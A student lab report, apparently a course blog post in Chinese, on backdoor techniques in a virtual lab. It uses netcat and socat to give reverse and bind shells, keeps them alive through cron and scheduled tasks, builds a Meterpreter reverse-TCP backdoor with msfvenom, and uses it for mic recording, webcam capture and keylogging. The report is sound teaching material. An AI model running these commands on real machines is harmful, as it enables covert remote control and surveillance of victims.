2018-2019-2 网络对抗技术 20165317 Exp2 后门原理与实践
2018-2019-2 网络对抗技术 20165317 Exp2 后门原理与实践
基础问题回答
- 例举你能想到的一个后门进入到你系统中的可能方式?
下载免费应用的时候会有绑定木马。
浏览某些网页时会有内置的木马程序。 - 例举你知道的后门如何启动起来(win及linux)的方式?
Windows:设置为开机自启动、用户直接执行带有后门的可执行文件
Linux:通过crontab功能将后门设为定时启动;也可以通过对正常软件绑定注入shellcode - Meterpreter有哪些给你映像深刻的功能?
我认为是截屏功能,能随时查看被访问主机的操作 如何发现自己有系统有没有被安装后门?
定期查杀木马。netcat的熟悉
一、win7获取 linux 的shell
1.首先在win7虚拟机开启监听ncat.exe -l -p 5317

2.Linux反弹连接win10 nc 192.168.1.104 5317 -e /bin/sh此处IP为win10的ip

3.Windows成功获得kali的shell

二、Linux获得Windows Shell
1.在kali中使用ifconfig查看IP

2.打开监听nc -l -p 5317

3.在Windows中反弹连接kali,ncat.exe -e cmd.exe 192.168.1.105 5317

4.kali成功获得Windows的命令提示

三、使用nc传输数据
1.Windows下监听5317端口,ncat.exe -l 5317
2.kali反弹连接到Windows的5317端口,nc 192.168.1.104 5317
3.连接建立成功,双方可以相互传输数据


四、使用nc传输文件
1.Windows下监听5317端口,并把收到的数据保存到file1.out中,ncat.exe -l 5317 > file1out
2.kali反弹连接到Windows的5317端口,nc 192.168.1.104 5317 < file1.in
3.连接建立成功,Win可以收到kali发来的文件。



实验内容
一、使用netcat获取主机操作Shell,cron启动
在Windows系统下,监听
5317端口

- 在Kali环境下,用
crontab -e指令编辑一条定时任务,(crontab指令增加一条定时任务,"-e"表示编辑)选择编辑器时选择3(vim) 在最后一行添加
26 * * * * /bin/netcat 192.168.1.104 5317 -e /bin/sh,意思是在每个小时的第26分钟反向连接Windows主机的5317端口。

效果如下:

二、使用socat获取主机操作Shell, 任务计划启动
在Windows7系统下,打开计算机管理,创建任务,填写任务名称后
20165317,新建一个触发器,设为工作站锁定时。

在编辑操作中选择你的socat.exe文件的路径,在添加参数一栏填写
tcp-listen:5317 exec:cmd.exe,pty,stderr,这个命令的作用是把cmd.exe绑定到端口5317,同时把cmd.exe的stderr重定向到stdout上

win+L或者右键运行,然后用kali输入socat - tcp:192.168.1.104:5317获得成功

三、使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell
通过在kali中输入
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.105 LPORT=5317 -f exe > 20165317_backdoor.exe,IP地址为LinuxIP,生成了后门程序20165317_backdoor.exe

在win7中监听
ncat.exe -l 5317 > 20165317_backdoor.exe

在Linux中输入
nc 192.168.1.104 5317 < 20165317_backdoor.exe

在Kali上使用msfconsole指令进入msf控制台

- 输入
use exploit/multi/handler使用监听模块,设置payload set payload windows/meterpreter/reverse_tcp,使用和生成后门程序时相同的payloadset LHOST 192.168.1.105,这里用的是LinuxIP,和生成后门程序时指定的IP相同set LPORT 5317,同样要使用相同的端口

设置完成后,执行监听

在win7上运行后门程序,并且在kali得到了远程控制的shell

四、使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权
- 使用
record_mic指令可以截获一段音频,可以用-d选项设置录制时间


使用
webcam_snap指令可以使用摄像头进行拍照(由于使用vbox无法使用摄像头,所以并没有抓取到照片。

使用
keyscan_start指令开始记录下击键的过程,使用keyscan_dump指令读取击键的记录

心得体会
因为参考了学长学姐和已经完成的同学的博客,本次实验并没有遇到特别多的困难,更加深刻的体会到安全的重要性
2018-2019-2 网络对抗技术 20165317 Exp2 后门原理与实践的更多相关文章
- 2018-2019-2 网络对抗技术 20165325 Exp2 后门原理与实践
2018-2019-2 网络对抗技术 20165325 Exp2 后门原理与实践 实验内容(概要): (1)使用netcat获取主机Shell,cron启动 首先两个电脑(虚拟机)都得有netcat, ...
- 2018-2019-2 网络对抗技术 20165232 Exp2 后门原理与实践
2018-2019-2 网络对抗技术 20165232 Exp2 后门原理与实践 1. 后门原理与实践实验说明及预备知识 一.实验说明 任务一:使用netcat获取主机操作Shell,cron启动 ( ...
- 2018-2019-2 20165237《网络对抗技术》Exp2 后门原理与实践
2018-2019-2 20165237<网络对抗技术>Exp2 后门原理与实践 一.实践目标 使用netcat获取主机操作Shell,cron启动 使用socat获取主机操作Shell, ...
- 2018-2019-2 网络对抗技术 20165206 Exp2 后门原理与实践
- 2018-2019-2 网络对抗技术 20165206 Exp2 后门原理与实践 - 实验任务 (1)使用netcat获取主机操作Shell,cron启动 (0.5分) (2)使用socat获取主 ...
- 2018-2019-2 网络对抗技术 20165323 Exp2 后门原理与实践
2018-2019-2 网络对抗技术 20165323 Exp2 后门原理与实践 一.实验要求 (3.5分) (1)使用netcat获取主机操作Shell,cron启动 (0.5分) (2)使用soc ...
- 2018-2019-2 20165235《网络对抗技术》Exp2 后门原理与实践
2018-2019-2 20165235<网络对抗技术>Exp2 后门原理与实践 实验内容 1.使用netcat获取主机操作Shell,cron启动 2.使用socat获取主机操作Shel ...
- 2018-2019-2 网络对抗技术 20165311 Exp2 后门原理与实践
2018-2019-2 网络对抗技术 20165311 Exp2 后门原理与实践 后门的基本概念 常用后门工具 netcat Win获得Linux Shell Linux获得Win Shell Met ...
- 2018-2019-2 网络对抗技术 20165336 Exp2 后门原理与实践
2018-2019-2 网络对抗技术 20165336 Exp2 后门原理与实践 1.基础问题回答 (1)例举你能想到的一个后门进入到你系统中的可能方式? 下载自己不熟悉的软件时含有病毒. 网络钓鱼, ...
- 2018-2019-2 网络对抗技术 20165236 Exp2 后门原理与实践
2018-2019-2 网络对抗技术 20165236 Exp2 后门原理与实践 一.实验内容 (3.5分) (1)使用netcat获取主机操作Shell,cron启动 (0.5分) (2)使用soc ...
随机推荐
- Eclipse 搭建 Strust2开发环境
一.创建一个动态Web项目 ♦ 注意 :一定要勾选Generate Web.xml deployment descriptor 选项,这个将在Eclipse为你创建一个动态web项目. 二.导入相关 ...
- jenkins中slave节点连接的两种常用方式
我们在使用jenkins的时候,一般来说肯定是有slave节点的,本来网上也有好多关于jenkins节点配置的教程,我也就不写了.简单说明一下:任务一般是在slave上面运行的.当然不是讲master ...
- Linux下安装VMware Tools(使虚拟机支持文件拖拽)
如图点击虚拟机找到安装VMware Tools选项,点击后会在虚拟机桌面显示一个光盘,双击进入如下页面: 选择压缩包将其复制放入Home中不带中文的文件夹: 打开终端,输入cd命令进入文件夹,将压缩包 ...
- js编译原理(你不知道的javascript)
虽然通常将js归类为"动态"或"解释执行"语言,但其实也可把它看成是一门编译语言.只不过这个所谓的编译与传统的编译语言不同,它不是提前编译的,编译结果也不能在分 ...
- windows10 php7安装mongodb 扩展及其他扩展的思路
1. 打开phpinfo 查看 nts(非线程) 还是 ts (线程),然后查看操作位数 注: 86 等于 32 位 ,和你的windows系统64 or 32位无关.比如我的: 2. 下载对应的版本 ...
- 十一.keepalived高可用服务实践部署
期中集群架构-第十一章-keepalived高可用集群章节======================================================================0 ...
- 商品规格笛卡尔积PHP
<?php $color = array('red', 'green'); $size = array(39, 40, 41); $local = array('beijing', 'shang ...
- 【微信小程序】 wx:if 与 hidden(隐藏元素)区别
wx:if 与 hidden 都可以控制微信小程序中元素的显示与否. 区别: wx:if 是遇 true 显示,hidden 是遇 false 显示. wx:if 在隐藏的时候不渲染,而 hidden ...
- jenkins添加类ubuntu/centos节点报错
前言:在jenkins添加ubuntu节点,发现启动代理报错 以下是报错: [SSH] Checking java version of /usr/java/latest/bin/java Could ...
- leetcode目录
Leetcode 1. 数组 2. 动态规划 3. 字符串 4. 链表.双指针.排序 5. 树 6. 回溯算法.贪心算法.分治算法.